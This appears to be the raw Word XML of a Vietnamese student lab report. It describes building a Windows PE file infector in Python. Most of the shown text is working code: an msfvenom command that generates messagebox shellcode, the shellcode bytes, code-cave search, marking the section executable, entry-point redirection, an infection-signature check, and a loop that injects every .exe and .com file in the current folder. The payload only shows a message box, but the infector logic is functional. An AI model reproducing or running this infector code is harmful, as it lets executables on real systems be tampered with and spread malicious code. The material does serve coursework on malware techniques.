    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="68D02397" wp14:textId="6A6AC13A">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vir_addr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.VirtualAddress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w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="458808C6" wp14:textId="6C62946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.Characteristics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E0000040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Đánh dấu có thể đọc thi và chứa dữ liệu khởi tạo</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="7735E227" wp14:textId="6387ACAE">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vir_addr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raw_addr</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="70DAF9D3" wp14:textId="0CCCBF9F">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p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="113F3DE9" wp14:textId="1A9E02EB">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Thực hiện việc modify lại shellcode bằng “</w:t>
      </w:r>
      <w:r w:rsidRPr="3742ED17" w:rsidR="61427DF6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfvenom -a x86 --platform windows -p windows/messagebox TEXT="21522065-21521955 - 21520237" ICON=INFORMATION EXITFUNC=process TITLE="Infection by NT230" -f python</w:t>
      </w:r>
      <w:r w:rsidRPr="3742ED17" w:rsidR="61427DF6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="05095093" wp14:textId="78C400AF">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349B106A" wp14:textId="472D757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\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31</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13639A2" wp14:textId="162BD373">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\xc9\x64\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b</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320870C1" wp14:textId="279C13D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\x46\x08\x8b\x7e\x20\x8b\x36\x38\x4f\x18\x75\xf3</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5BB247C" wp14:textId="622117A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\x59\x01\xd1\xff\xe1\x60\x8b\x6c\x24\x24\x8b\x45</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14E177E" wp14:textId="4D6B4B2A">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\x3c\x8b\x54\x28\x78\x01\xea\x8b\x4a\x18\x8b\x5a</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0FE8F6B" wp14:textId="6FD417FF">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\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01\xee\x31</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DFBD171" wp14:textId="5F5029EB">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\xff\x31\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d</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5B97F86" wp14:textId="0BAF9748">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\x01\xc7\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a</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12DB217B" wp14:textId="0CED102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\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb</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A3A1490" wp14:textId="6CCBC8A2">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\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc3\xb2</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8BAD9E2" wp14:textId="72BB9AF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\x08\x29\xd4\x89\xe5\x89\xc2\x68\x8e\x4e\x0e\xec</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1662F2D" wp14:textId="4A7BFAC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\x52\xe8\x9f\xff\xff\xff\x89\x45\x04\xbb\x7e\xd8</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ACB1D04" wp14:textId="6FF9432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\xe2\x73\x87\x1c\x24\x52\xe8\x8e\xff\xff\xff\x89</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1843B4BE" wp14:textId="629A2788">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\x45\x08\x68\x6c\x6c\x20\x41\x68\x33\x32\x2e\x64</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6664FED" wp14:textId="217C0481">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\x68\x75\x73\x65\x72\x30\xdb\x88\x5c\x24\x0a\x89</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7D8100A0" wp14:textId="645886FE">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\xe6\x56\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d</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3204383" wp14:textId="2E71103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\xbc\x87\x1c\x24\x52\xe8\x5f\xff\xff\xff\x68\x33</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8E2F578" wp14:textId="51C70045">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\x30\x58\x20\x68\x20\x4e\x54\x32\x68\x6e\x20\x62</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7C80C9AB" wp14:textId="26571805">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\x79\x68\x63\x74\x69\x6f\x68\x49\x6e\x66\x65\x31</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5B6086A6" wp14:textId="17499B5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\xdb\x88\x5c\x24\x12\x89\xe3\x68\x33\x37\x58\x20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76DD5DB6" wp14:textId="53A1AE0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\x68\x35\x32\x30\x32\x68\x35\x2d\x32\x31\x68\x32</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72B1F654" wp14:textId="1BEBC172">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\x31\x39\x35\x68\x2d\x32\x31\x35\x68\x32\x30\x36</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3002316" wp14:textId="2839EAA4">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\x35\x68\x32\x31\x35\x32\x31\xc9\x88\x4c\x24\x1a</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B938347" wp14:textId="61E88CD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\x89\xe1\x31\xd2\x6a\x40\x53\x51\x52\xff\xd0\x90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Sửa lại vì để thêm shellcode call entry point</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="06349221" wp14:textId="4A8E7C00">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shellcode += b"\x89\xe1\x31\xd2\x6a\x40\x53\x51\x52\xff\xd0\x31"</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="259B79FD" wp14:textId="50DBB1D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shellcode += b"\xc0\x50\xff\x55\x08"</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="51A542FA" wp14:textId="50782CE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returnAddress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5ABAB14" wp14:textId="6F40CD1B">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\xB8</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returnAddress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#Mov eax, returnAddress</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="74D7F01C" wp14:textId="5231299B">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\xFF\xD0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#Call eax</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="4FE5EF9F" wp14:textId="4B4D196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len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2308FBF" wp14:textId="117F0B71">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paddingBytes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\x90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#Nop</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="3E8382EF" wp14:textId="795BED85">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paddingBytes</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="5E17CCEB" wp14:textId="0E2DB4C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\x90\x90\x90\x90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#Padding nop ở đầu shellcode</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="4A4254FD" wp14:textId="4C077051">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Cuối cùng là thực hiện chèn và chỉnh sửa các thông số phù hợp:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="0E3B5FFE" wp14:textId="23436ED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.set_bytes_at_offset(</w:t>
      </w:r>
      <w:r w:rsidRPr="3742ED17" w:rsidR="61427DF6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>new_raw_data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674F71D1" wp14:textId="124F4D67">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.OPTIONAL_HEADER.AddressOfEntryPoint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77096861" wp14:textId="2BE1B58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.write(</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11D1A66" wp14:textId="694EDA4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"Shellcode injected to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9883BE8" wp14:textId="1F8CFEF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.close()</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="12684D2C" wp14:textId="3034141B">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Bên cạnh đó thực hiện thêm signature vào trong file đã được inject giúp đánh dấu rằng file này đã bị lây nhiễm và viết 1 hàm kiểm tra nó</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="7E24BBE2" wp14:textId="51913DF0">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####Thêm đánh dấu</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="7C02C9C3" wp14:textId="2D946F0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Mở file ở chế độ append binary ('ab') và sử dụng os to seek to the end of the file</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="3135934D" wp14:textId="4F63E93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'ab'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B80BFF7" wp14:textId="5DA42DA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SEEK_END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Di chuyển con trỏ đến cuối file</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="42763123" wp14:textId="06C9CF2A">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\x4C\x00\x6F\x00\x76\x00\x65\x00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Thêm 8 byte</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="1D2EF48D" wp14:textId="6154FB78">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>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700499C3" wp14:textId="1B51963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569CD6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>def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check_last_8_bytes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signature</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\x4C\x00\x6F\x00\x76\x00\x65\x00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208D29E" wp14:textId="03742B9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A885109" wp14:textId="2A087C01">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Mở tệp ở chế độ đọc binary ('rb').</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="668620D9" wp14:textId="327DCC8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'rb'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A9A033A" wp14:textId="5FED015A">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con trỏ tới 8 byte cuối của tệp.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="17B9D6B8" wp14:textId="0809D23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8</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SEEK_END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E3E3AF3" wp14:textId="5C6D82A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Đọc 8 byte cuối và so sánh với chuỗi 'signature'.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="718AB50D" wp14:textId="266D2319">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read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8</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signature</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="27B27BCA" wp14:textId="0A2256B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except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OSError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99AED7D" wp14:textId="4FBB999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"Không thể mở tệp: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17C1C4F" wp14:textId="0FCC3852">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="569CD6"/>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False</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="40633463" wp14:textId="4A861DC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except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Exception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C9502AB" wp14:textId="2BF0FF9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"Lỗi không xác định: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E9C03BC" wp14:textId="758DA69B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="569CD6"/>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False</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="2ED015D3" wp14:textId="2079CC22">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>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4513B5D3" wp14:textId="4D88906D">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Đoạn mã hoàn chỉnh có dạng:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="66CD09F4" wp14:textId="455FD34D">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shutil</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="48DAD310" wp14:textId="58E355A2">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pefile</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="53D8E318" wp14:textId="4C6C4E5F">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p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="08653561" wp14:textId="1DD02DAB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="4EC9B0"/>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import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glob</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="437997A5" wp14:textId="6412385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77362007" wp14:textId="503CBE4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569CD6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>def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findSection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A568438" wp14:textId="2E20B2B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"rb"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261E78B" wp14:textId="4058060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.sections:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="23BA306D" wp14:textId="0A45B7B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.SizeOfRawData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7357570" wp14:textId="52305AFA">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p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="055016BD" wp14:textId="5DCFC55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.PointerToRawData,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con trỏ đến đầu section</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="0FF9C37A" wp14:textId="7DE006CE">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p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="3B5A75A0" wp14:textId="624C0BE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while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&lt;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.SizeOfRawData:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="0CDCF1D6" wp14:textId="6D92206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read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1</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72D6D359" wp14:textId="0A861464">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w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="28AA2965" wp14:textId="0EE2751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byte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00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17B1F61" wp14:textId="17103E66">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w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="4E25D11F" wp14:textId="410E0834">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else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3D976CE" wp14:textId="0BA1BCE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&gt;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minShellCode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DF8B964" wp14:textId="27278FAD">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raw_addr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.PointerToRawData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w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="4C0520F9" wp14:textId="7A3279B5">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vir_addr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.VirtualAddress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position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w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="7897AE40" wp14:textId="4E1B80E4">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.Characteristics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0x</w:t>
      </w:r>
      <w:r w:rsidRPr="3742ED17" w:rsidR="61427DF6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="B5CEA8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>E0000040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Đánh dấu có thể đọc thi và chứa dữ liệu khởi tạo</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="225FD0FE" wp14:textId="52F6F928">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vir_addr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raw_addr</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="70FB4975" wp14:textId="25A5A608">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="B5CEA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count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p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="39E3D850" wp14:textId="312FE09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54FB45A7" wp14:textId="2342414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569CD6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>def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check_last_8_bytes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signature</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\x4C\x00\x6F\x00\x76\x00\x65\x00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C4C8A68" wp14:textId="65D7D89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5349A69" wp14:textId="15ECFE57">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Mở tệp ở chế độ đọc binary ('rb').</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="334B83D0" wp14:textId="63C0547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'rb'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F822CA6" wp14:textId="033C86D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Di chuyển con trỏ tới 8 byte cuối của tệp.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="7EC20058" wp14:textId="044A980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8</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SEEK_END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30148A7" wp14:textId="0561C38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Đọc 8 byte cuối và so sánh với chuỗi 'signature'.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="6AB05E53" wp14:textId="54C6CCE0">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read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8</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signature</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="36758789" wp14:textId="5986E7F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except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OSError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0D558DB" wp14:textId="37F2697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"Không thể mở tệp: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062DB39" wp14:textId="4A0D84E6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="569CD6"/>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False</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="0460B208" wp14:textId="51F32837">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except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Exception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784A275" wp14:textId="2DBE9DD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"Lỗi không xác định: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F3BC482" wp14:textId="53B4D498">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="569CD6"/>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return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False</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="2519A1AB" wp14:textId="0518802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282F4A40" wp14:textId="4C15C95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Danh sách các file nguồn và file inject</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="6E08B164" wp14:textId="0EA1E05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filenames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    </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="5EF86E54" wp14:textId="2B806B5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p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="3175C307" wp14:textId="1A26500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500A41C2" wp14:textId="30CEE80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Lấy tất cả các file .exe và .com trong thư mục hiện tại</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="23D4CEF4" wp14:textId="5EBF27E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exe_files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glob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glob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'*.exe'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14853D9" wp14:textId="79E9094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com_files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glob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glob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'*.com'</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8E018D5" wp14:textId="1B126782">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5139CB88" wp14:textId="4CE75AF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Kết hợp danh sách các file .exe và .com</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="2E92EFCE" wp14:textId="08155C64">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9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>executable_files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exe_files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com_files</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="5E6D47FE" wp14:textId="047DFBC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3CF25C7A" wp14:textId="20C6C762">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7CA668"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Lặp qua mỗi file trong danh sách và tạo file mới có tên kết thúc bằng "-inject.exe"</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="5A2B8975" wp14:textId="1725E5B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executable_files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11D6767" wp14:textId="1703359F">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not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check_last_8_bytes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B0312F0" wp14:textId="6718A1B9">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Tạo tên file mới</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="3CFDA871" wp14:textId="5E2F6B5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append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55667F2" wp14:textId="2E6223A7">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-inject.exe"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Cắt phần ".exe" và thêm "-inject.exe"</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="4EC070DA" wp14:textId="0CCB97E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append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8D6FC8E" wp14:textId="221300F3">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Copy file nguồn sang file mới</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="2E40D73C" wp14:textId="148F578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shutil</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copyfile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new_filename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C1094A3" wp14:textId="2C21F134">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
        <w:spacing w:after="24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69534A3F" wp14:textId="3277964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C586C0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for</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filenames_inject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C7A1196" wp14:textId="35D88E0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not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check_last_8_bytes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4604962" wp14:textId="06C4121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try</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453336A" wp14:textId="5E31EF5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D9BF474" wp14:textId="245878E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"This is a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0C5E68D0" wp14:textId="3D45C933">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01F94B9C" wp14:textId="65E32095">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Load file PE</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="06A163E7" wp14:textId="31D7A90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pefile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.PE(</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0F59337" wp14:textId="7E7D70A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73A9E588" wp14:textId="240E7E5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.OPTIONAL_HEADER.AddressOfEntryPoint</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="7A2733BE" wp14:textId="53946DF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.OPTIONAL_HEADER.ImageBase</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="4238653D" wp14:textId="5C136FB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61B174A6" wp14:textId="72AF5D0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"AddressOfEntryPoint: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77818DA" wp14:textId="38C7122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"ImageBase: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31D33FD" wp14:textId="578EB645">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5B2FCB77" wp14:textId="3682AD16">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.sections:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="4F23450D" wp14:textId="4475C21E">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Chuẩn bị shell code</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="13AE817C" wp14:textId="2FF850F7">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1042B87F" wp14:textId="1AC7C70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\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31</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39F57ABD" wp14:textId="7AE3E84A">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\xc9\x64\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b</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90982DC" wp14:textId="0C771BAA">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\x46\x08\x8b\x7e\x20\x8b\x36\x38\x4f\x18\x75\xf3</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DC49635" wp14:textId="0B9F1EB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\x59\x01\xd1\xff\xe1\x60\x8b\x6c\x24\x24\x8b\x45</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12AF4A0C" wp14:textId="3BAB0D4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\x3c\x8b\x54\x28\x78\x01\xea\x8b\x4a\x18\x8b\x5a</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517FA3D" wp14:textId="2A5F861A">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\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01\xee\x31</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458589E" wp14:textId="2CA0D342">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\xff\x31\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d</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103D1B9" wp14:textId="262599B7">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\x01\xc7\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a</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24C4D84" wp14:textId="13E735C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\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb</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CC7DA6C" wp14:textId="6750C10A">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\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc3\xb2</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967D587" wp14:textId="62B57960">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\x08\x29\xd4\x89\xe5\x89\xc2\x68\x8e\x4e\x0e\xec</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0AB0E735" wp14:textId="159C5B43">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\x52\xe8\x9f\xff\xff\xff\x89\x45\x04\xbb\x7e\xd8</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781D949E" wp14:textId="6194F27F">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\xe2\x73\x87\x1c\x24\x52\xe8\x8e\xff\xff\xff\x89</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5F526D5A" wp14:textId="3CB20C5F">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\x45\x08\x68\x6c\x6c\x20\x41\x68\x33\x32\x2e\x64</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FF50DDE" wp14:textId="0BFF8D3E">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\x68\x75\x73\x65\x72\x30\xdb\x88\x5c\x24\x0a\x89</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C560F5A" wp14:textId="5590F307">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\xe6\x56\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d</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0AA928F" 